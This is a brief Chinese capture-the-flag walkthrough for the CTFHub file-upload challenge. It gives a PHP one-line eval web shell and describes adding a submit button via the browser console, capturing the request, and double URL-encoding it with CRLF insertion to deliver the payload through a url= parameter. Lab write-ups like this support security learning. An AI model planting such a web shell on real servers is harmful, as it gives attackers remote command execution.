CTFHub-上传文件

打开网址

新建一个文档,在其中写下面的内容,将名字该为1.php

<?php @eval($_POST[cmd]);?>

将1.php提交上去,发现没反应

按f12查看后发现没有提交的代码,右键编辑,自己写一个

<input type="submit" name="submit">

编辑代码后结果如下

将1.php提交查询抓包

修改一下

进行url编码

在记事本中,在最后加上%0A,使用替换将%0A全部替换为%0D%0A

再次url编码

将结果放到url=后面

将前两个%253A换成:

相关推荐
zhaoyufei1334 分钟前
Android触屏TP驱动事件上报以及多点触摸
android
杨筱毅6 分钟前
【Android】详细讲解ViewDragHelper的实现原理(不含代码版)
android
德福危险6 小时前
密码枚举的艺术:靶机练习之midwest
服务器·安全·web安全
IT小哥哥呀6 小时前
5 个 Windows 故障排除工具
windows·故障排除·系统运维·windows系统·电脑问题
代码s贝多芬的音符7 小时前
ios android 小程序 蓝牙 CRC16_MODBUS
android·ios·小程序
应用市场8 小时前
构建自定义命令行工具 - 打造专属指令体
开发语言·windows·python
东方佑8 小时前
从字符串中提取重复子串的Python算法解析
windows·python·算法
jieyu11198 小时前
uploads-labs靶场通关(2)
web安全·靶场通关
Forfun_tt8 小时前
upload-labs pass-19
web安全·网络安全
缘友一世9 小时前
文件上传漏洞和绕过技术
web安全·网络安全·渗透测试·文件上传漏洞·开发安全